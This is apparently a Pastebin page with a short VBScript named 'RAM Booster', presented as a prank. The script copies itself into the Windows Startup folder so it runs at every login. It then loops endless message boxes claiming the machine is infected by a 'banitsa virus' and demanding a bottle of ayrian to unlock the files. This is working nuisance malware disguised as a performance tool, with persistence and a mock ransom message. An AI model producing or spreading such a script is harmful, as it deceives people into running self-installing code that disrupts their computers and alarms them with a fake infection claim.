Advertisement
Koragg

RAM Booster [VBScript]

Oct 16th, 2018
244
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 'https://computer-pranks.wonderhowto.com/how-to/make-prank-popup-message-windows-thats-hard-get-rid-0124836/
  2. 'https://social.technet.microsoft.com/Forums/ie/en-US/6240a1cc-ee80-46e7-9db4-87a4a42a7b60/copying-file-from-relative-path-to-startup-folder?forum=ITCG
  3.  
  4. dim file, relpath, objshell, startupfolder
  5.  
  6. set file = createobject("scripting.filesystemobject")
  7. set objshell = createobject("wscript.shell")
  8.  
  9. relpath = file.getparentfoldername(wscript.scriptfullname)
  10. startupfolder = objshell.specialfolders("Startup")
  11.  
  12. if file.fileexists(relpath & "\RAM Booster.vbs") then
  13.     file.copyfile relpath & "\RAM Booster.vbs", startupfolder & "\"
  14. end if
  15.  
  16. do
  17.     msgbox("Your computer has been infected with a banitsa virus.")
  18.     msgbox("Please purchase a bottle of ayrian in order to unlock your files.")
  19. loop
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement